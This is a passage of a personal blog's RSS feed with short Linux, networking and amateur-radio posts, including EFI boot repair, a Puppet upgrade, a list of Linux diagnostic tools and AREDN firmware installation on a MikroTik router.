  1488. <pre># gdisk /dev/nvme0n1
  1490. p print the partition table
  1491. t change a partition's type code
  1492. t change a partition's type code
  1493. w write table to disk and exit</pre></li>
  1494. <li>Chroot into the on-disk root system:
  1495. <pre># mount -t ext4 /dev/nvme0n1p1 /mnt
  1496. # mkdir /mnt/boot/efi
  1497. # mount /dev/nvme0n1p2 /mnt/boot/efi
  1498. # mount --bind /sys /mnt/sys
  1499. # mount --bind /proc /mnt/proc
  1500. # mount --bind /dev /mnt/dev
  1501. # mount --bind /dev/pts /mnt/dev/pts
  1502. # cp /etc/resolv.conf /mnt/etc/resolv.conf
  1503. # chroot /mnt</pre></li>
  1504. <li>Update /etc/fstab:
  1505. <pre># ls -lisa /dev/disk/by-uuid</pre>
  1506. Identify the UUID of the EFI partition (usually in the format <code>XXXX-XXXX</code>) and add a corresponding line to <code>/etc/fstab</code>:
  1507. <pre># echo "UUID=XXXX-XXXX /boot/efi vfat defaults 0 2" &gt;&gt; /etc/fstab</pre></li>
  1508. <li>Install grub-efi and install Grub2 to the EFI partition:
  1509. <pre># apt-get remove grub-pc
  1510. # apt-get install grub-efi</pre>
  1511. <pre># grub-install /dev/nvme0n1</pre></li>
  1512. <li>Exit the chroot and reboot the system:
  1513. <pre># exit
  1514. # reboot</pre></li>
  1515. <li>Select the Debian bootloader (<code>/EFI/debian/grubx64.efi</code>) in the UEFI BIOS and make it the default :-)</li>
  1516. </ol>
  1517. ]]></content:encoded>
  1518.  </item>
  1520.  <item>
  1521.    <title>Create a bootable Debian USB stick on macOS</title>
  1522.    <link></link>
  1523.    <guid isPermaLink="true"></guid>
  1524.    <dc:creator>Andreas Jaggi</dc:creator>
  1525.    <creativeCommons:license></creativeCommons:license>
  1526.    <pubDate>Sun, 05 May 2024 14:39:00 +0200</pubDate>
  1527.    <category domain="">Linux</category>
  1528.    <description><![CDATA[<p>Needed to create a bootable Debian USB stick for some maintenance on one of my computers.<br>Here are the steps so I won't have to search for them the next time :-)</p>
  1529. <ol>
  1530. <li>Download the <a href="" title="">Debian live CD image</a></li>
  1531. <li>Connect your USB stick and find its device location (/dev/diskX) with: <pre>sudo diskutil list</pre></li>
  1532. <li>If needed unmount your USB stick: <pre>sudo diskutil unmountdisk /dev/diskX</pre></li>
  1533. <li>Write the downloaded image onto the USB stick: <pre>sudo dd if=./debian-live-12.5.0-amd64-standard.iso of=/dev/diskX bs=1m</pre></li>
  1534. </ol>
  1535. ]]></description>
  1536.    <content:encoded><![CDATA[<p>Needed to create a bootable Debian USB stick for some maintenance on one of my computers.<br>Here are the steps so I won't have to search for them the next time :-)</p>
  1537. <ol>
  1538. <li>Download the <a href="" title="">Debian live CD image</a></li>
  1539. <li>Connect your USB stick and find its device location (/dev/diskX) with: <pre>sudo diskutil list</pre></li>
  1540. <li>If needed unmount your USB stick: <pre>sudo diskutil unmountdisk /dev/diskX</pre></li>
  1541. <li>Write the downloaded image onto the USB stick: <pre>sudo dd if=./debian-live-12.5.0-amd64-standard.iso of=/dev/diskX bs=1m</pre></li>
  1542. </ol>
  1543. ]]></content:encoded>
  1544.  </item>
  1546.  <item>
  1547.    <title>Tiny Fragments</title>
  1548.    <link></link>
  1549.    <guid isPermaLink="true"></guid>
  1550.    <dc:creator>Andreas Jaggi</dc:creator>
  1551.    <creativeCommons:license></creativeCommons:license>
  1552.    <pubDate>Wed, 24 Apr 2024 21:58:00 +0200</pubDate>
  1553.    <category domain="">Misc</category>
  1554.    <description><![CDATA[<p><a href="" title="Tiny Fragments by Daniel Moreno">Tiny Fragments</a> is a fun little puzzle game made by <a href="" title="Dazlog">Daniel Moreno</a> (<a href="" title="Game: Tiny Fragments | Thomas Gigold">via</a>)</p>
  1555. <img src="" height="230" width="400" alt="Tiny Fragments - The Tree">
  1556. ]]></description>
  1557.    <content:encoded><![CDATA[<p><a href="" title="Tiny Fragments by Daniel Moreno">Tiny Fragments</a> is a fun little puzzle game made by <a href="" title="Dazlog">Daniel Moreno</a> (<a href="" title="Game: Tiny Fragments | Thomas Gigold">via</a>)</p>
  1558. <img src="" height="230" width="400" alt="Tiny Fragments - The Tree">
  1559. ]]></content:encoded>
  1560.  </item>
  1562.  <item>
  1563.    <title>Testing HTML with modern CSS</title>
  1564.    <link></link>
  1565.    <guid isPermaLink="true"></guid>
  1566.    <dc:creator>Andreas Jaggi</dc:creator>
  1567.    <creativeCommons:license></creativeCommons:license>
  1568.    <pubDate>Tue, 23 Apr 2024 00:30:00 +0200</pubDate>
  1569.    <category domain="">Webdesign</category>
  1570.    <description><![CDATA[<p>Interesting article explaining how to test HTML with visual CSS highlighting: <a href="" title="Testing HTML with modern CSS: HeydonWorks">Testing HTML with modern CSS</a> (<a href="" title="Links | Couchblog">via</a>)</p>
  1571. ]]></description>
  1572.    <content:encoded><![CDATA[<p>Interesting article explaining how to test HTML with visual CSS highlighting: <a href="" title="Testing HTML with modern CSS: HeydonWorks">Testing HTML with modern CSS</a> (<a href="" title="Links | Couchblog">via</a>)</p>
  1573. ]]></content:encoded>
  1574.  </item>
  1576.  <item>
  1577.    <title>Print HTTP Headers and Pretty-Print JSON Response</title>
  1578.    <link></link>
  1579.    <guid isPermaLink="true"></guid>
  1580.    <dc:creator>Andreas Jaggi</dc:creator>
  1581.    <creativeCommons:license></creativeCommons:license>
  1582.    <pubDate>Mon, 15 Apr 2024 09:37:00 +0200</pubDate>
  1583.    <category domain="">Linux</category>
  1584.    <description><![CDATA[<p>In the <a href="" title="Print HTTP Headers and Pretty-Print JSON Response - Susam Pal">Print HTTP Headers and Pretty-Print JSON Response</a> post, <a href="" title="Susam Pal">Susam Pal</a> shows a nice trick to pretty-print JSON output with jq from curl while also showing the HTTP response headers (using stderr):</p>
  1585. <pre>curl -sSD /dev/stderr https://some-URL-returning-JSON | jq .</pre>
  1586. ]]></description>
  1587.    <content:encoded><![CDATA[<p>In the <a href="" title="Print HTTP Headers and Pretty-Print JSON Response - Susam Pal">Print HTTP Headers and Pretty-Print JSON Response</a> post, <a href="" title="Susam Pal">Susam Pal</a> shows a nice trick to pretty-print JSON output with jq from curl while also showing the HTTP response headers (using stderr):</p>
  1588. <pre>curl -sSD /dev/stderr https://some-URL-returning-JSON | jq .</pre>
  1589. ]]></content:encoded>
  1590.  </item>
  1592.  <item>
  1593.    <title>Modern Git Commands and Features You Should Be Using</title>
  1594.    <link></link>
  1595.    <guid isPermaLink="true"></guid>
  1596.    <dc:creator>Andreas Jaggi</dc:creator>
  1597.    <creativeCommons:license></creativeCommons:license>
  1598.    <pubDate>Sat, 13 Apr 2024 20:37:00 +0200</pubDate>
  1599.    <category domain="">Coding</category>
  1600.    <description><![CDATA[<p><a href="" title="Modern Git Commands and Features You Should Be Using | Martin Heinz | Personal Website &amp; Blog">Modern Git Commands and Features You Should Be Using</a> &mdash; a short article from <a href="" title="Martin Heinz | Personal Website &amp; Blog">Martin Heinz</a> about some new-ish (&gt;2018) features in <a href="" title="Git">Git</a>, that 'can make your life so much easier'.</p>
  1601. <p>TL;DR:</p>
  1602. <ul>
  1603. <li><code>git switch &lt;branchname&gt;</code></li>
  1604. <li><code>git restore --staged &lt;somefile&gt;</code></li>
  1605. <li><code>git restore --source &lt;commit&gt; &lt;somefile&gt;</code></li>
  1606. <li><code>git sparse-checkout</code></li>
  1607. <li><code>git worktree</code></li>
  1608. <li><code>git bisect</code></li>
  1609. </ul>
  1610. <p>Similar post from five years ago: <a href="" title="More productive Git - x-log">More productive Git</a></p>
  1611. ]]></description>
  1612.    <content:encoded><![CDATA[<p><a href="" title="Modern Git Commands and Features You Should Be Using | Martin Heinz | Personal Website &amp; Blog">Modern Git Commands and Features You Should Be Using</a> &mdash; a short article from <a href="" title="Martin Heinz | Personal Website &amp; Blog">Martin Heinz</a> about some new-ish (&gt;2018) features in <a href="" title="Git">Git</a>, that 'can make your life so much easier'.</p>
  1613. <p>TL;DR:</p>
  1614. <ul>
  1615. <li><code>git switch &lt;branchname&gt;</code></li>
  1616. <li><code>git restore --staged &lt;somefile&gt;</code></li>
  1617. <li><code>git restore --source &lt;commit&gt; &lt;somefile&gt;</code></li>
  1618. <li><code>git sparse-checkout</code></li>
  1619. <li><code>git worktree</code></li>
  1620. <li><code>git bisect</code></li>
  1621. </ul>
  1622. <p>Similar post from five years ago: <a href="" title="More productive Git - x-log">More productive Git</a></p>
  1623. ]]></content:encoded>
  1624.  </item>
  1626.  <item>
  1627.    <title>NTP IPs</title>
  1628.    <link></link>
  1629.    <guid isPermaLink="true"></guid>
  1630.    <dc:creator>Andreas Jaggi</dc:creator>
  1631.    <creativeCommons:license></creativeCommons:license>
  1632.    <pubDate>Thu, 11 Apr 2024 21:41:00 +0200</pubDate>
  1633.    <category domain="">Networking</category>
  1634.    <description><![CDATA[<p>This <a href="" title="Going in circles without a real-time clock">post</a> from Rachel, reminded me of my own struggle with a Raspberry Pi and time (and yes, I did run into the same DNSSEC problem).<br>I first tried a RTC shield, but this didn't fully solve all problems.</p>
  1635. <p>My workaround in the end is to use two fixed IP addresses in ntp.conf in additon to the usual pool servers.<br>Thanks ${previous employer} for not changing the IPs of your public NTP servers so far :-)</p>
  1636. ]]></description>
  1637.    <content:encoded><![CDATA[<p>This <a href="" title="Going in circles without a real-time clock">post</a> from Rachel, reminded me of my own struggle with a Raspberry Pi and time (and yes, I did run into the same DNSSEC problem).<br>I first tried a RTC shield, but this didn't fully solve all problems.</p>
  1638. <p>My workaround in the end is to use two fixed IP addresses in ntp.conf in additon to the usual pool servers.<br>Thanks ${previous employer} for not changing the IPs of your public NTP servers so far :-)</p>
  1639. ]]></content:encoded>
  1640.  </item>
  1642.  <item>
  1643.    <title>Back on native IPv6</title>
  1644.    <link></link>
  1645.    <guid isPermaLink="true"></guid>
  1646.    <dc:creator>Andreas Jaggi</dc:creator>
  1647.    <creativeCommons:license></creativeCommons:license>
  1648.    <pubDate>Wed, 10 Apr 2024 20:28:00 +0200</pubDate>
  1649.    <category domain="">Networking</category>
  1650.    <description><![CDATA[<p>As hinted at in my <a href="" title="SixSpotting still going on - x-log">previous post</a>, Solnet is delivering native IPv6 Internet again.</p>
  1651. <p>Shortly after 23h on March 26th there was a brief interruption of the Internet uplink and afterwards my router started receiving an IPv6 address again.<br>My <a href="" title="Tunnelbroker to the rescue - x-log">support ticket with Solnet</a> is still unanswered, but at least IPv6 is back :-)</p>
  1652. ]]></description>
  1653.    <content:encoded><![CDATA[<p>As hinted at in my <a href="" title="SixSpotting still going on - x-log">previous post</a>, Solnet is delivering native IPv6 Internet again.</p>
  1654. <p>Shortly after 23h on March 26th there was a brief interruption of the Internet uplink and afterwards my router started receiving an IPv6 address again.<br>My <a href="" title="Tunnelbroker to the rescue - x-log">support ticket with Solnet</a> is still unanswered, but at least IPv6 is back :-)</p>
  1655. ]]></content:encoded>
  1656.  </item>
  1658.  <item>
  1659.    <title>SixSpotting still going on</title>
  1660.    <link></link>
  1661.    <guid isPermaLink="true"></guid>
  1662.    <dc:creator>Andreas Jaggi</dc:creator>
  1663.    <creativeCommons:license></creativeCommons:license>
  1664.    <pubDate>Wed, 10 Apr 2024 19:05:00 +0200</pubDate>
  1665.    <category domain="">Networking</category>
  1666.    <description><![CDATA[<p>While browsing through the archives I stumbled upon the <a href="" title="SixSpotting - x-log">SixSpotting post</a> from 2014.<br>Turns out <a href="" title="SixSpotting">the game</a> is still working and after some failed attempts I managed to remember my account name and log in.<br>I guess it must look quite strange to see a burst of new checkins after almost 10 years &#x1F604;</p>
  1667. <p><img src="" width="420" height="87" alt="My last 5 SixSpotting checkins" /></p>
  1668. ]]></description>
  1669.    <content:encoded><![CDATA[<p>While browsing through the archives I stumbled upon the <a href="" title="SixSpotting - x-log">SixSpotting post</a> from 2014.<br>Turns out <a href="" title="SixSpotting">the game</a> is still working and after some failed attempts I managed to remember my account name and log in.<br>I guess it must look quite strange to see a burst of new checkins after almost 10 years &#x1F604;</p>
  1670. <p><img src="" width="420" height="87" alt="My last 5 SixSpotting checkins" /></p>
  1671. ]]></content:encoded>
  1672.  </item>
  1674.  <item>
  1675.    <title>humans.txt</title>
  1676.    <link></link>
  1677.    <guid isPermaLink="true"></guid>
  1678.    <dc:creator>Andreas Jaggi</dc:creator>
  1679.    <creativeCommons:license></creativeCommons:license>
  1680.    <pubDate>Sun, 07 Apr 2024 19:10:00 +0200</pubDate>
  1681.    <category domain="">Webdesign</category>
  1682.    <description><![CDATA[<p>After following a couple links from the article linked in the previous blogpost, I ended up reading the <a href="" title="Website Component Checklis">Website Component Checklist</a> from <a href="" title="Mike Sass">Mike Sass</a>.<br>It provides again a lot of inspiration for things to add to my weblog.<br>What intrigued me today on the list was <a href="" title="Humans TXT: We Are People, Not Machines.">humans.txt</a>, which is an initiative for knowing the people behing a website.</p>
  1683. <p>Thus I've now added the following <a href="" title="x-log - Humans TXT">humans.txt</a>.</p>
  1684. ]]></description>
  1685.    <content:encoded><![CDATA[<p>After following a couple links from the article linked in the previous blogpost, I ended up reading the <a href="" title="Website Component Checklis">Website Component Checklist</a> from <a href="" title="Mike Sass">Mike Sass</a>.<br>It provides again a lot of inspiration for things to add to my weblog.<br>What intrigued me today on the list was <a href="" title="Humans TXT: We Are People, Not Machines.">humans.txt</a>, which is an initiative for knowing the people behing a website.</p>
  1686. <p>Thus I've now added the following <a href="" title="x-log - Humans TXT">humans.txt</a>.</p>
  1687. ]]></content:encoded>
  1688.  </item>
  1690.  <item>
  1691.    <title>100 more things you can do with your personal website</title>
  1692.    <link></link>
  1693.    <guid isPermaLink="true"></guid>
  1694.    <dc:creator>Andreas Jaggi</dc:creator>
  1695.    <creativeCommons:license></creativeCommons:license>
  1696.    <pubDate>Sun, 07 Apr 2024 17:32:00 +0200</pubDate>
  1697.    <category domain="">Misc</category>
  1698.    <description><![CDATA[<p><a href="" title="100 (more) things you can do with your personal website | James' Coffee Blog">100 more things you can do with your personal website</a> &mdash; a follow-up to the <a href="" title="x-log - 100 things you can do on your personal website">popular post</a> from last month :-)</p>
  1699. ]]></description>
  1700.    <content:encoded><![CDATA[<p><a href="" title="100 (more) things you can do with your personal website | James' Coffee Blog">100 more things you can do with your personal website</a> &mdash; a follow-up to the <a href="" title="x-log - 100 things you can do on your personal website">popular post</a> from last month :-)</p>
  1701. ]]></content:encoded>
  1702.  </item>
  1704.  <item>
  1705.    <title>Dog Poo Golf</title>
  1706.    <link></link>
  1707.    <guid isPermaLink="true"></guid>
  1708.    <dc:creator>Andreas Jaggi</dc:creator>
  1709.    <creativeCommons:license></creativeCommons:license>
  1710.    <pubDate>Wed, 03 Apr 2024 08:03:00 +0200</pubDate>
  1711.    <category domain="">Misc</category>
  1712.    <description><![CDATA[<p><img src="" width="480" height="347" alt="Dog Poo Golf start screen" /></p>
  1713. <p><a href="" title="Dog Poo Golf &#x1F436;&#x1F4A9;&#x26F3;">Dog Poo Golf</a>, a Wii Sports Golf-style browser game (with the music!) where you fling dog poop bags into a garbage can. &#x1F436;&#x1F4A9;&#x26F3; (<a href="" title=" - Dog Poo Golf">via</a>)</p>
  1714. ]]></description>
  1715.    <content:encoded><![CDATA[<p><img src="" width="480" height="347" alt="Dog Poo Golf start screen" /></p>
  1716. <p><a href="" title="Dog Poo Golf &#x1F436;&#x1F4A9;&#x26F3;">Dog Poo Golf</a>, a Wii Sports Golf-style browser game (with the music!) where you fling dog poop bags into a garbage can. &#x1F436;&#x1F4A9;&#x26F3; (<a href="" title=" - Dog Poo Golf">via</a>)</p>
  1717. ]]></content:encoded>
  1718.  </item>
  1720.  <item>
  1721.    <title>Puppet updated!</title>
  1722.    <link></link>
  1723.    <guid isPermaLink="true"></guid>
  1724.    <dc:creator>Andreas Jaggi</dc:creator>
  1725.    <creativeCommons:license></creativeCommons:license>
  1726.    <pubDate>Sat, 30 Mar 2024 13:03:00 +0100</pubDate>
  1727.    <category domain="">Linux</category>
  1728.    <description><![CDATA[<p>Yay! Successfully updated my <a href="" title="About Puppet Server">Puppet Server</a> setup from 5.3.7 to 8.4.0 &#x1f389;</p>
  1729. <p>It was quite a step (5.3.7 was released in January 2019) and as expected 3 major version bumps came with a couple changes.</p>
  1730. <p>I opted to re-create the PuppetDB and CA stores from scratch (to avoid having to migrate 5 years of data schema changes, and the CA cert is now also valid for a couple more years again).</p>
  1731. <p>To make the old manifests and modules work with the new versions, quite some effort was needed. This included rewriting some no longer maintained modules to use newer stdlib and concat libraries, updating a couple modules from the puppet forge (with the bonus that my puppet server runs airgapped and I had to use the download-tar-copy-extract way to install them) and fixing no longer valid syntax here and there in my custom manifests. Overall I spent about 5 hours on it (and have now a recurring reminder to update puppet more often to make this process less painful).</p>
  1732. <p>Helpful as usual were the resources from <a href="" title="Vox Pupuli">Vox Pupuli</a>, in particular the <a href="" title="Voxpupuli Puppet Server container">Puppet Server</a> and <a href="" title="Voxpupuli PuppetDB container">PuppetDB</a> Docker images and the <a href="" title="voxpupuli/crafty: CRAFTY - Containerized Resources And Funky Tools (in) YAML">CRAFTY repo</a> which contains a fully self-contained Docker Compose setup very similar to what I'm running.</p>
  1733. <p>Some commands that came in handy:</p>
  1734. <p><code>puppet config print ssldir --section agent</code><br>
  1735. Returns the path of the TLS config folder on the client. Useful during a CA change (where you <code>rm -rf</code> the whole folder and then request a new TLS certificate).</p>
  1736. <p><code>puppet agent -t --noop</code><br>
  1737. Dry-run the changes on the client (it does request a new TLS cert though!). Shows a nice diff of the changes it would do to files, helpful to validate that a manifest still behaves the same in the new version.</p>
  1738. ]]></description>
  1739.    <content:encoded><![CDATA[<p>Yay! Successfully updated my <a href="" title="About Puppet Server">Puppet Server</a> setup from 5.3.7 to 8.4.0 &#x1f389;</p>
  1740. <p>It was quite a step (5.3.7 was released in January 2019) and as expected 3 major version bumps came with a couple changes.</p>
  1741. <p>I opted to re-create the PuppetDB and CA stores from scratch (to avoid having to migrate 5 years of data schema changes, and the CA cert is now also valid for a couple more years again).</p>
  1742. <p>To make the old manifests and modules work with the new versions, quite some effort was needed. This included rewriting some no longer maintained modules to use newer stdlib and concat libraries, updating a couple modules from the puppet forge (with the bonus that my puppet server runs airgapped and I had to use the download-tar-copy-extract way to install them) and fixing no longer valid syntax here and there in my custom manifests. Overall I spent about 5 hours on it (and have now a recurring reminder to update puppet more often to make this process less painful).</p>
  1743. <p>Helpful as usual were the resources from <a href="" title="Vox Pupuli">Vox Pupuli</a>, in particular the <a href="" title="Voxpupuli Puppet Server container">Puppet Server</a> and <a href="" title="Voxpupuli PuppetDB container">PuppetDB</a> Docker images and the <a href="" title="voxpupuli/crafty: CRAFTY - Containerized Resources And Funky Tools (in) YAML">CRAFTY repo</a> which contains a fully self-contained Docker Compose setup very similar to what I'm running.</p>
  1744. <p>Some commands that came in handy:</p>
  1745. <p><code>puppet config print ssldir --section agent</code><br>
  1746. Returns the path of the TLS config folder on the client. Useful during a CA change (where you <code>rm -rf</code> the whole folder and then request a new TLS certificate).</p>
  1747. <p><code>puppet agent -t --noop</code><br>
  1748. Dry-run the changes on the client (it does request a new TLS cert though!). Shows a nice diff of the changes it would do to files, helpful to validate that a manifest still behaves the same in the new version.</p>
  1749. ]]></content:encoded>
  1750.  </item>
  1752.  <item>
  1753.    <title>Linux Crisis Tools</title>
  1754.    <link></link>
  1755.    <guid isPermaLink="true"></guid>
  1756.    <dc:creator>Andreas Jaggi</dc:creator>
  1757.    <creativeCommons:license></creativeCommons:license>
  1758.    <pubDate>Mon, 25 Mar 2024 21:45:00 +0100</pubDate>
  1759.    <category domain="">Linux</category>
  1760.    <description><![CDATA[<p><a href="" title="Brendan Gregg's Homepage">Brendan Gregg</a> posted the following <a href="" title="Linux Crisis Tools">list of 'crisis tools'</a> which you should install on your Linux servers by default (so they are available when an incident happens).</p>
  1761. <table>
  1762. <tr><th>Package</th><th>Provides</th><th>Notes</th></tr>
  1763. <tr><td>procps</td><td>ps(1), vmstat(8), uptime(1), top(1)</td><td>basic stats</td></tr>
  1764. <tr><td>util-linux</td><td>dmesg(1), lsblk(1), lscpu(1)</td><td>system log, device info</td></tr>
  1765. <tr><td>sysstat</td><td>iostat(1), mpstat(1), pidstat(1), sar(1)</td><td>device stats</td></tr>
  1766. <tr><td>iproute2</td><td>ip(8), ss(8), nstat(8), tc(8)</td><td>preferred net tools</td></tr>
  1767. <tr><td>numactl</td><td>numastat(8)</td><td>NUMA stats</td></tr>
  1768. <tr><td>tcpdump</td><td>tcpdump(8)</td><td>Network sniffer</td></tr>
  1769. <tr><td>linux-tools-common<br>linux-tools-$(uname -r)</td><td>perf(1), turbostat(8)</td><td>profiler and PMU stats</td></tr>
  1770. <tr><td>bpfcc-tools (bcc)</td><td>opensnoop(8), execsnoop(8), runqlat(8), softirqs(8),<br>hardirqs(8), ext4slower(8), ext4dist(8), biotop(8),<br>biosnoop(8), biolatency(8), tcptop(8), tcplife(8),<br>trace(8), argdist(8), funccount(8), profile(8), etc.</td><td>canned eBPF tools[1]</td></tr>
  1771. <tr><td>bpftrace</td><td>bpftrace, basic versions of opensnoop(8),<br>execsnoop(8), runqlat(8), biosnoop(8), etc.</td><td>eBPF scripting[1]</td></tr>
  1772. <tr><td>trace-cmd</td><td>trace-cmd(1)</td><td>Ftrace CLI</td></tr>
  1773. <tr><td>nicstat</td><td>nicstat(1)</td><td>net device stats</td></tr>
  1774. <tr><td>ethtool</td><td>ethtool(8)</td><td>net device info</td></tr>
  1775. <tr><td>tiptop</td><td>tiptop(1)</td><td>PMU/PMC top</td></tr>
  1776. <tr><td>cpuid</td><td>cpuid(1)</td><td>CPU details</td></tr>
  1777. <tr><td>msr-tools</td><td>rdmsr(8), wrmsr(8)</td><td>CPU digging</td></tr>
  1778. </table>
  1779. ]]></description>
  1780.    <content:encoded><![CDATA[<p><a href="" title="Brendan Gregg's Homepage">Brendan Gregg</a> posted the following <a href="" title="Linux Crisis Tools">list of 'crisis tools'</a> which you should install on your Linux servers by default (so they are available when an incident happens).</p>
  1781. <table>
  1782. <tr><th>Package</th><th>Provides</th><th>Notes</th></tr>
  1783. <tr><td>procps</td><td>ps(1), vmstat(8), uptime(1), top(1)</td><td>basic stats</td></tr>
  1784. <tr><td>util-linux</td><td>dmesg(1), lsblk(1), lscpu(1)</td><td>system log, device info</td></tr>
  1785. <tr><td>sysstat</td><td>iostat(1), mpstat(1), pidstat(1), sar(1)</td><td>device stats</td></tr>
  1786. <tr><td>iproute2</td><td>ip(8), ss(8), nstat(8), tc(8)</td><td>preferred net tools</td></tr>
  1787. <tr><td>numactl</td><td>numastat(8)</td><td>NUMA stats</td></tr>
  1788. <tr><td>tcpdump</td><td>tcpdump(8)</td><td>Network sniffer</td></tr>
  1789. <tr><td>linux-tools-common<br>linux-tools-$(uname -r)</td><td>perf(1), turbostat(8)</td><td>profiler and PMU stats</td></tr>
  1790. <tr><td>bpfcc-tools (bcc)</td><td>opensnoop(8), execsnoop(8), runqlat(8), softirqs(8),<br>hardirqs(8), ext4slower(8), ext4dist(8), biotop(8),<br>biosnoop(8), biolatency(8), tcptop(8), tcplife(8),<br>trace(8), argdist(8), funccount(8), profile(8), etc.</td><td>canned eBPF tools[1]</td></tr>
  1791. <tr><td>bpftrace</td><td>bpftrace, basic versions of opensnoop(8),<br>execsnoop(8), runqlat(8), biosnoop(8), etc.</td><td>eBPF scripting[1]</td></tr>
  1792. <tr><td>trace-cmd</td><td>trace-cmd(1)</td><td>Ftrace CLI</td></tr>
  1793. <tr><td>nicstat</td><td>nicstat(1)</td><td>net device stats</td></tr>
  1794. <tr><td>ethtool</td><td>ethtool(8)</td><td>net device info</td></tr>
  1795. <tr><td>tiptop</td><td>tiptop(1)</td><td>PMU/PMC top</td></tr>
  1796. <tr><td>cpuid</td><td>cpuid(1)</td><td>CPU details</td></tr>
  1797. <tr><td>msr-tools</td><td>rdmsr(8), wrmsr(8)</td><td>CPU digging</td></tr>
  1798. </table>
  1799. ]]></content:encoded>
  1800.  </item>
  1802.  <item>
  1803.    <title>Installing the AREDN firmware on a MikroTik hAP ac lite</title>
  1804.    <link></link>
  1805.    <guid isPermaLink="true"></guid>
  1806.    <dc:creator>Andreas Jaggi</dc:creator>
  1807.    <creativeCommons:license></creativeCommons:license>
  1808.    <pubDate>Sun, 24 Mar 2024 14:26:00 +0100</pubDate>
  1809.    <category domain="">Radio</category>
  1810.    <description><![CDATA[<p>At the recent <a href="" title="Tango Foxtrott Wireless Society HB9TF">HB9TF</a> AGM fellow radio amateur <a href="" title="Martin Suess (HB9GVM)">HB9GVM</a> gave an introductory presentation about <a href="" title="Amateur Radio Emergency Data Network">AREDN</a>.</p>
  1811. <p>Motivated by this, I ordered a <a href="" title="MikroTik hAP ac lite">MikroTik hAP ac lite</a> and installed the AREDN firmware on it.<br>The following are my notes of the installation process.</p>
  1812. <ol>
  1813. <li>Download the firmware images for the MikroTik hAP ac lite from <a href="" title="AREDN Firmware Selector"></a> (both the *kernel.bin and *sysupgrade.bin are needed)</li>
  1814. <li>Install <a href="" title="Dnsmasq - network services for small networks">Dnsmasq</a> as a PXE server on Mac OS: <pre>brew install dnsmasq</pre></li>
  1815. <li>Setup the *kernel.bin for PXE: <pre>mkdir tftp-root
  1816. cp $HOME/Downloads/aredn- tftp-root/rb.elf</pre></li>
  1817. <li>Connect a Ethernet dongle and configure it with this static IP:</li>
  1818. <li>Run dnsmasq as a PXE server listening on the network interface of the Ethernet dongle: <pre>ifconfig en6 # use to check that IP is configured
  1819. sudo dnsmasq -i en6 -u $(whoami) --log-dhcp --bootp-dynamic --dhcp-range=, -d -p0 -K --dhcp-boot=rb.elf --enable-tftp --tftp-root=$(pwd)/tftp-root/</pre></li>
  1820. <li>Power off the hAP ac lite and connect the Ethernet dongle to port 1 (<strong>PXE booting only seems to work on this port!</strong>)</li>
  1821. <li>Press the reset button on the hAP ac lite, power it on and keep the button pressed for about 20 seconds (there is some output of dnsmask once the PXE booting is in progress)</li>
  1822. <li>Wait until the hAP ac lite stops blinking and the LEDs are steady again (it also issues a new DHCP request via port1, but this time no PXE booting).</li>
  1823. <li>Move the cable to port 2 (the AREDN default config for the MikroTik hAP ac lite uses port 1 for the Internet uplink, and port 2 for the 'inside' local network).</li>
  1824. <li>Test that you can ping the inside IP of the AREDN node: <pre>ping</pre></li>
  1825. <li>Open the admin page on <code></code> (Username is <code>root</code> and password is <code>hsmm</code>).</li>
  1826. <li>In the Firmware Update section, click on 'Upload Firmware' and select the previously downloaded sysupgrade.bin file.</li>
  1827. <li>Wait until a reboot has happened twice (it takes a couple minutes!) to complete the installation.</li>
  1828. <li>Open <code></code> &ndash; congratulations, you now have a freshly installed (and not yet configured) AREDN node :-)</li>
  1829. </ol>
  1830. ]]></description>
  1831.    <content:encoded><![CDATA[<p>At the recent <a href="" title="Tango Foxtrott Wireless Society HB9TF">HB9TF</a> AGM fellow radio amateur <a href="" title="Martin Suess (HB9GVM)">HB9GVM</a> gave an introductory presentation about <a href="" title="Amateur Radio Emergency Data Network">AREDN</a>.</p>
  1832. <p>Motivated by this, I ordered a <a href="" title="MikroTik hAP ac lite">MikroTik hAP ac lite</a> and installed the AREDN firmware on it.<br>The following are my notes of the installation process.</p>
  1833. <ol>
  1834. <li>Download the firmware images for the MikroTik hAP ac lite from <a href="" title="AREDN Firmware Selector"></a> (both the *kernel.bin and *sysupgrade.bin are needed)</li>
  1835. <li>Install <a href="" title="Dnsmasq - network services for small networks">Dnsmasq</a> as a PXE server on Mac OS: <pre>brew install dnsmasq</pre></li>
  1836. <li>Setup the *kernel.bin for PXE: <pre>mkdir tftp-root
  1837. cp $HOME/Downloads/aredn- tftp-root/rb.elf</pre></li>
  1838. <li>Connect a Ethernet dongle and configure it with this static IP:</li>
  1839. <li>Run dnsmasq as a PXE server listening on the network interface of the Ethernet dongle: <pre>ifconfig en6 # use to check that IP is configured
  1840. sudo dnsmasq -i en6 -u $(whoami) --log-dhcp --bootp-dynamic --dhcp-range=, -d -p0 -K --dhcp-boot=rb.elf --enable-tftp --tftp-root=$(pwd)/tftp-root/</pre></li>
  1841. <li>Power off the hAP ac lite and connect the Ethernet dongle to port 1 (<strong>PXE booting only seems to work on this port!</strong>)</li>
  1842. <li>Press the reset button on the hAP ac lite, power it on and keep the button pressed for about 20 seconds (there is some output of dnsmask once the PXE booting is in progress)</li>
  1843. <li>Wait until the hAP ac lite stops blinking and the LEDs are steady again (it also issues a new DHCP request via port1, but this time no PXE booting).</li>
  1844. <li>Move the cable to port 2 (the AREDN default config for the MikroTik hAP ac lite uses port 1 for the Internet uplink, and port 2 for the 'inside' local network).</li>
  1845. <li>Test that you can ping the inside IP of the AREDN node: <pre>ping</pre></li>
  1846. <li>Open the admin page on <code></code> (Username is <code>root</code> and password is <code>hsmm</code>).</li>
  1847. <li>In the Firmware Update section, click on 'Upload Firmware' and select the previously downloaded sysupgrade.bin file.</li>
  1848. <li>Wait until a reboot has happened twice (it takes a couple minutes!) to complete the installation.</li>
  1849. <li>Open <code></code> &ndash; congratulations, you now have a freshly installed (and not yet configured) AREDN node :-)</li>
  1850. </ol>
  1851. ]]></content:encoded>
  1852.  </item>
  1854.  <item>
  1855.    <title>Fifty Things you can do with a Software Defined Radio 📻</title>
  1856.    <link></link>
  1857.    <guid isPermaLink="true"></guid>
  1858.    <dc:creator>Andreas Jaggi</dc:creator>
  1859.    <creativeCommons:license></creativeCommons:license>
  1860.    <pubDate>Sun, 17 Mar 2024 09:50:00 +0100</pubDate>
  1861.    <category domain="">Radio</category>
  1862.    <description><![CDATA[<p><a href="" title="Fifty Things you can do with a Software Defined Radio">Fifty Things you can do with a Software Defined Radio 📻</a> &mdash; some cool SDR things to do (have done already some of them and more with my <a href="" title="Tango Foxtrott Wireless Society HB9TF">HB9TF</a> friends :-)</p>
